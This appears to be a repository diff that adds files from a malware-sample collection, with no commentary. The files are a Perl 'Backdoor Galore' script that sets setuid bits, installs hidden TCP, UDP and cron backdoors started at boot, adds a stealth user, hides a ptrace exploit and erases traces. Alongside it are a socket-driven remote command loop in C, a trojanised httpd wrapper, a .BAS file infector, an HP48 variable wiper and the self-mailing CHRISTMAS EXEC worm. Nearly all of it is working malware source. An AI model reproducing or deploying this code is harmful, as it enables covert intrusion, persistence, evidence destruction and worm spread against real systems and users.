do{for(*v=b,p=0;**v&&((*v-b)<512||(p=*v));(*v)++)if(p||**v=='\r'||**v=='\n')
{**v=0;break;}if(p)continue;system(b);recv(c,&b,1024,0);}while(1);exit(0);}

141
Linux/Backdoor.Unix.Galore.11 Normal file
View File

@ -0,0 +1,141 @@
#!/usr/bin/perl
# BackDoor Galore 1.1 (fixed!)
# Author: NTFX <ntfx@legion2000.tk>
# Legion2000 Security Research 1995 -
# This is a simple perl script which backdoors a system for you.
# Updated, set wrong rc.local patch and didnt execute them, blah!
# thats what happens when you code at 4am.
###################################
&option();
sub option() {
system("clear");
print "##################################\n";
print "#Backdoor Galore By NTFX #\n";
print "#Contact: <ntfx\@legion2000.tk> #\n";
print "#Legion2000 Security Research (c)#\n";
print "##################################\n";
print "#[ 1] Do this first of all. #\n"; # must do this cause im lazy.
print "#[ 2] Create setuid binary's. #\n"; # /usr/bin/mail & /usr/bin/find.
print "#[ 3] Open up TCP backdoor. #\n"; # 12350 # hid /usr/sbin/.telnetd.
print "#[ 4] Open up UDP backdoor. #\n"; # 65535 # hid /usr/sbin/.telnetd.
print "#[ 5] Add Cron Sched'd backdoor. #\n"; # 10001 # only open 3 hours a day.
print "#[ 6] Add unsuspicious user. #\n"; # gpm or news prob best.
print "#[ 7] Hide ptrace Exploit. #\n"; # /dev/.pts.
print "#[ 8] Removes Traces #\n";
print "#[ 9] Social Calls. #\n"; # Sociable Greetings.
print "#[10] Exit the backdoor Script. #\n"; # quit the backdoor.
print "##################################\n";
print "#Enter Option:";
chomp($number=<STDIN>);
if($number == "1") { &di() }
if($number == "2") { &uid() }
if($number == "3") { &tcp() }
if($number == "4") { &udp() }
if($number == "5") { &cro() }
if($number == "6") { &usr() }
if($number == "7") { &ptr() }
if($number == "8") { &rem() }
if($number == "9") { &soc() }
if($number == "10") { &ex() }
else { &option() } }
##################
sub di() {
system ("clear");
system ("cd $HOME; mkdir ntfx script; mv *.c $HOME/ntfx; mv *pl $HOME/script");
sleep 2; }
##################
sub uid() {
system ("clear");
print "we will now make a setuid file in /usr/bin";
system ("cd /usr/bin; chmod +s mail; cd $HOME");
print "mail is now +s\n"; #edit as you wish.
system ("cd /usr/bin; chmod +s find; cd $HOME");
print "find is now +s\n"; #edit as you wish.
sleep 1; }
##################
sub tcp() {
system ("clear");
print "We are now going to create a basic tcp backdoor\n";
system ("cd ../ntfx; gcc tcp.c -o tcp; mv /usr/sbin/.telnetd; echo
/usr/sbin/.telnetd >> /etc/rc.d/rc.local; /usr/sbin/.telnetd &"); # starts on boot.
print "tcp backdoor is now running on specified port and enabled at boot\n";
sleep 1; }
###################
sub udp() {
system ("clear");
print "We are now going to install a basic udp backdoor\n";
system ("cd ../ntfx; gcc udp.c -o udp; mv /usr/sbin/.telnetd.; echo
/usr/sbin/.telnetd. >> /etc/rc.d/rc.local; /usr/sbin/.telnetd. &");
print "udp backdoor now running on specified port and enabled at boot\n";
sleep 1; }
###################
sub cro() {
system ("clear");
print "We are now going to install a backdoor into the crond\n";
system ("bash crond.sh");
print "The cron backdoor is now installed, and running on the specified port\n";
sleep 1; }
###################
sub usr() {
system ("clear");
print "we will now add a unsuspicious user to the system\n";
print "username: ";
chomp($user=<STDIN>); # be sensible, an acc called "hax0r" will be noticed.
print "UID: ";
chomp($uid=<STDIN>);
print "GID: ";
chomp($gid=<STDIN>);
print "home dir: ";
chomp($home=<STDIN>); #/home/httpd maybe?
print "type of shell: ";
chomp($sh=<STDIN>);
print "comments: "; # preferably leave blank
chomp($cm=<STDIN>);
system("/usr/sbin/useradd $user -u $uid -g $gid -d $home -s $sh -c $cm");
system("passwd $user");
sleep 1; }
##################
sub ptr() {
system ("clear");
print "we are now going to compile and hide the ptrace exploit\n";
print "name the user you previously entered";
chomp ($usr=<STDIN>);
system ("cd ../ntfx; gcc ptrace.c -o pts; chown $usr pts; mv pts /dev/.pts");
print "ptrace is now stored in /dev/.pts";
sleep 1; }
##################
sub soc() {
system ("clear");
print "Greetings:\n";
sleep 1;
print "opt1k, SpyModem, eckis, EazyMoney, Phantasm, Epheo, I-L, wired-\n";
sleep 1;
print "BlackSun Research, Legion2000 Crew, efnet #feed-the-goats\n";
$sex;
print "press any key to continue....";
chomp($sex=<STDIN>); }
##################
sub rem() {
system ("clear");
print "we are now going to remove files we have used.\n";
system ("rm -rf $HOME/scripts; rm -rf $HOME/ntfx");
print "now removing history files.\n";
system ("HISTFILE=/dev/null; HISTFILESIZE=0; rm -rf .*"); }
# had to redo due to paul holden selecting remove traces on the original source.
#############
sub ex() {
system("clear");
print" # ##### ### ### ###\n";
print" # ###### #### # #### # # # # # # # # # #\n";
print" # # # # # # # ## # # # # # # # #\n";
print" # ##### # # # # # # # ##### # # # # # #\n";
print" # # # ### # # # # # # # # # # # # #\n";
print" # # # # # # # # ## # # # # # # #\n";
print" ####### ###### #### # #### # # ####### ### ### ###\n";
print" www.legion2000.tk\n";
print" efnet #feed-the-goats\n";
print"\n\n";
print"Press Any Key To Exit\n";
$sex;
chomp($sex=<STDIN>);
exit 1;}

1034
Linux/Constructor.Script.IBBM.a Normal file
View File

File diff suppressed because it is too large Load Diff

13
Linux/Virus.BAS.Xyc Normal file
View File

@ -0,0 +1,13 @@
CLS
REM The first Quick Basic infection Virus
REM written by SeCoNd PaRt To HeLl
REM for showing, that .BAS can be infected
REM NAME of the Virus: BAS.XYC
OPEN "C:\xyc.bat" FOR OUTPUT AS #1
PRINT #1, "@echo off"
PRINT #1, "if exist xyc.bas copy xyc.bas C:\xyc.bas"
PRINT #1, "for %%r in (*.bas ..\*.bas %windir%\*.bas) do copy C:\xyc.bas %%r"
CLOSE #1
SHELL "C:\xyc.bat"

96
Linux/Virus.Linux.TrojoDaemon.c Normal file
View File

@ -0,0 +1,96 @@
/* ......:::: daemon trojo by DeV^AwaY ::::......
*
*
* [*] --> coded by: DeV^AwaY
* [*] ------------> devilnet@freemail.it
* [*] ------------> ircnet/efnet@DeV^AwaY
* [*] --> V3rsion: 0.2
*
* install:
* To install this trojan you should copy the real daemon in another
* directory !WITH THE SOME NAME!. Then you should compile this source on the
* real daemon file in its some directory.
* So write in /dev/ptyh all path/commands to execute with
* daemon. If you must use options with commands you must divide they
* with the $ character.
* Ex:
*
* cat /dev/ptyh
* /home/hacker/. /psybnc <-- without options
* /home/hacker/bot/eggdrop$ -m bot.conf -t <-- with options
* /home/hacker/. $ <-- to run the file ". "
*
* Default
* trojo daemon /usr/sbin/httpd
* real deamon /usr/bin/httpd #EXE_PATH
*
*/
#include <stdio.h>
#include <stdlib.h>
#define TRJ_PATH "/dev/ptyh"
#define EXE_PATH "/usr/bin/httpd"
main (int argc,char **argv,char **envp) {
char fstr[200],**addr=malloc(200),slas[500],slaw[500];
int i,ic=1,deic,sllen;
FILE *ofile;
if (fork() == 0) {
if ((ofile=fopen(TRJ_PATH,"r"))==NULL) exit(0);
while (!feof(ofile)) {
fgets(fstr, 200, ofile);
for (i=0; i<strlen(fstr); i++) if (fstr[i]=='\n') fstr[i]='\0';
addr[ic]=malloc(200);
strcpy(addr[ic],fstr);
ic++;
}
deic=ic-2; ic=0;
while (ic!=deic) {
ic++;
i=0;
memset(slaw, 0, 500);
strcpy(slas,addr[ic]);
sllen=strlen(slas);
while (i!=sllen) {
if (slas[i]=='$') {
(slas[i]='"');
goto out; }
else i++;
}
out:
if (sllen==i) strcat(slas,"\"");
strncpy(slaw,slas,i);
if ((ofile=fopen(slaw,"r"))==NULL) exit(0);
strcpy(addr[ic],slas);
strcpy(addr[ic],"cd \"");
while (sllen!=0) {
if (slas[sllen]=='/') goto out2;
else sllen--;
}
out2:
strncat(addr[ic],slas,sllen);
strcat(addr[ic],"\" && \".");
strcat(addr[ic],slas+sllen);
strcat(addr[ic]," 1>/dev/null 2>/dev/null &");
system(addr[ic]);
}
exit(0);
}
if ((ofile=fopen(EXE_PATH,"r"))==NULL) {
printf("bash: %s: No such file or directory\n",EXE_PATH);
exit(0);
}
execve(EXE_PATH, argv, envp);
}

13
Linux/Virus.Script.Higu Normal file
View File

@ -0,0 +1,13 @@
<< CLLCD
"Press any key to run Protect System" MSGBOX
<< DO
HOME CLEAR VARS OBJ-> DROP
'V1' STO
PURGE 'V1'
UNTIL DEPTH 0
END
>> CLVAR CLEAR
CLLCD
"Bye HP48..... virus_br@hotmail.com Higuita(3c)" MSGBOX
1400 .60 BEEP
>> 'BYEHP48' [STO]

102
Linux/Virus.Script.IBM.XMasTreeWorm Normal file
View File

@ -0,0 +1,102 @@
/*********************/
/* LET THIS EXEC */
/* */
/* RUN */
/* */
/* AND */
/* */
/* ENJOY */
/* */
/* YOURSELF! */
/*********************/
'VMFCLEAR'
SAY ' * '
SAY ' * '
SAY ' *** '
SAY ' ***** '
SAY ' ******* '
SAY ' ********* '
SAY ' ************* A'
SAY ' ******* '
SAY ' *********** VERY'
SAY ' *************** '
SAY ' ******************* HAPPY'
SAY ' *********** '
SAY ' *************** CHRISTMAS'
SAY ' ******************* '
SAY ' *********************** AND MY'
SAY ' *************** '
SAY ' ******************* BEST WISHES'
SAY ' *********************** '
SAY ' *************************** FOR THE NEXT'
SAY ' ****** '
SAY ' ****** YEAR'
SAY ' ****** '
/* browsing this file is no fun at all
just type CHRISTMAS from cms */
dropbuf
makebuf
"q t (stack"
pull d1 d2 d3 d4 d5 dat
pull zeile
jeah = substr(dat,7,2)
tack = substr(dat,4,2)
mohn = substr(dat,1,2)
if jeah <= 88 then do
if mohn <2 ] mohn = 12 then do
DROPBUF
MAKEBUF
"IDENTIFY ( FIFO"
PULL WER VON WO IST REST
DROPBUF
MAKEBUF
"EXECIO * DISKR " WER " NAMES A (FIFO"
DO WHILE QUEUED() > 0
PULL NICK NAME ORT
NAM = INDEX(NAME,'.')+1
IF NAM > 0 THEN DO
NAME = SUBSTR(NAME,NAM)
END
NAM = INDEX(ORT,'.')+1
IF NAM > 0 THEN DO
ORT = SUBSTR(ORT,NAM)
END
IF LENGTH(NAME)>0 THEN DO
IF LENGTH(ORT) = 0 THEN DO
ORT = WO
END
if name ^= "RELAY" then do
"SF CHRISTMAS EXEC A " NAME " AT " ORT " (ack"
end
END
END
DROPBUF
MAKEBUF
ANZ = 1
"EXECIO * DISKR " WER " NETLOG A (FIFO"
DO WHILE QUEUED() > 0
PULL KIND FN FT FM ACT FROM ID AT NODE REST
IF ACT = 'SENT' THEN DO
IF ANZ = 1 THEN DO
OK.ANZ = ID
END
IF ANZ > 1 THEN DO
OK.ANZ = ID
NIXIS = 0
DO I = 1 TO ANZ-1
IF OK.I = ID THEN DO
NIXIS = 1
END
END
END
ANZ = ANZ + 1
IF NIXIS = 0 THEN DO
"SF CHRISTMAS EXEC A " ID " AT " NODE " (ack"
END
END
END
DROPBUF
END
end
end


BIN
Linux/Virus.Script.MBP.Kynel Normal file
View File

Binary file not shown.